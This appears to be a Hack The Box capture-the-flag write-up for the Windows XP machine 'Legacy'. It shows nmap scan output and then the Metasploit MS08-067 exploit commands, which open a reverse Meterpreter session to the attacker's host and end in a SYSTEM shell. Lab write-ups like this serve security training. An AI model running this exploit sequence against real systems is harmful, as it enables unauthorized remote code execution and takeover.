Information About Our Target
- Hostname: Legacy
- IP Address: 10.10.10.4
- Operating System Family: Windows
Abstract / Overview
This machine’s instance SMB is vulnerable to MS08-067 allowing for us to execute arbitrary code in a system context.
Information Gathering
Port Scan
1. Surface Scan
We begin with a quick scan of the top 1000 ports, leveraging only nmap’s banner grabbing script.
Output:
# Nmap 7.60 scan initiated Wed Dec 6 09:39:46 2017 as: nmap -sS -T4 -oA 01-tcp-top1k/top-1k --stats-every 60s --max-retries 3 --top-ports 1000 --script banner --reason 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up, received echo-reply ttl 127 (0.023s latency).
Not shown: 997 filtered ports
Reason: 997 no-responses
PORT STATE SERVICE REASON
139/tcp open netbios-ssn syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
3389/tcp closed ms-wbt-server reset ttl 127
# Nmap done at Wed Dec 6 09:40:06 2017 -- 1 IP address (1 host up) scanned in 19.93 seconds
Hm, not much here. We see we have SMB available between TCP 139 and 445, and we have a closed remote desktop protocol (RDP) port (TCP 3389). Hints that we’re potentially facing a Windows system, as it’s much more common to find RDP running on a Windows machine than it is on Linux. Usually we’d find VNC on a *nix machine.
2. Deep Scan
Since we have an idea of what the host is running, we can now run a more thorough scan of the host, checking all TCP ports. This is going to take longer to run, but will give us significantly more information to work with.
# Nmap 7.60 scan initiated Wed Dec 6 09:40:06 2017 as: nmap -sS -T4 -sV -oA 02-tcp-full/full-tcp --stats-every 60s --max-retries 3 -p- --reason 10.10.10.4
Nmap scan report for 10.10.10.4
Host is up, received echo-reply ttl 127 (0.038s latency).
Not shown: 65532 filtered ports
Reason: 65532 no-responses
PORT STATE SERVICE REASON VERSION
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server reset ttl 127
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Dec 6 10:00:54 2017 -- 1 IP address (1 host up) scanned in 1248.59 seconds
Hm, we didn’t get all that much from this. No new ports, but we do know now that this is a Windows XP machine.
Services
So based on this we know a lot more about the host and it appears to be running:
- Samba (TCP 139/445)
Exploitation
Since we know this is a Windows XP machine, we should try our hand at one of the most pervasive SMB vulnerabilities that ever hit Windows XP: MS08-067.
Details on this exploit: https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067
Exploit itself: https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
So lets try this out
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 10.10.10.4
RHOST => 10.10.10.4
msf exploit(ms08_067_netapi) > set LHOST 10.10.14.5
LHOST => 10.10.14.5
msf exploit(ms08_067_netapi) > set LPORT 443
LPORT => 443
msf exploit(ms08_067_netapi) > exploit
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179267 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.5:443 -> 10.10.10.4:1029) at 2017-12-06 10:35:17 -0500
meterpreter > sysinfo
Computer : LEGACY
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > shell
Process 1136 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\Administrator\Desktop>echo %username%
echo %username%
LEGACY$
Perfect! We’re now running as the SYSTEM machine account (machine account usernames are denoted by the $ at the end). We can now dump the user and root proofs!